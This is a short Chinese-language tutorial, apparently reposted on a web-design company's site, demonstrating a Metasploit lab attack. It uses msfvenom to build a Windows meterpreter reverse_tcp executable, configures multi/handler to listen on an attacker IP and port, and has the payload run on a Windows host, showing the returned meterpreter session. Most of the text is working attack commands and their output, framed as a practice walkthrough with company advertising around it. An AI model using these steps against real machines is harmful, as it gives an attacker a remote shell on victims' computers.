網絡拓撲:
kaili系統版本:
注:前面的版本在生成shellcode的時候用的是msfpayload命令
創新互聯建站專注于企業成都全網營銷推廣、網站重做改版、崇義網站定制設計、自適應品牌網站建設、H5建站、商城系統網站開發、集團公司官網建設、成都外貿網站制作、高端網站制作、響應式網頁設計等建站業務,價格優惠性價比高,為崇義等各大城市提供網站開發制作服務。
1.kaili生成shellcode:root@debian:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.152.131 lport=1211 -f exe > /root/shell.exe
()
2.偵聽shellcode:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.152.131
lhost => 192.168.152.131
msf exploit(multi/handler) > set lport 1211
lport => 1211
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211
3.將生成的sehllcode上傳至windows主機中并運行:
4.已經有session返回
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.152.131:1211
[*] Sending stage (179779 bytes) to 192.168.152.129
[*] Meterpreter session 1 opened (192.168.152.131:1211 -> 192.168.152.129:1039) at 2018-02-24 07:58:44 +0000
5.成功拿到shell:
分享文章:Kali下Metasploit的shellcode在windows中的使用
網頁地址:http://vcdvsql.cn/article36/ggpgpg.html
成都網站建設公司_創新互聯,為您提供全網營銷推廣、網站制作、企業網站制作、網站維護、App設計、用戶體驗
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯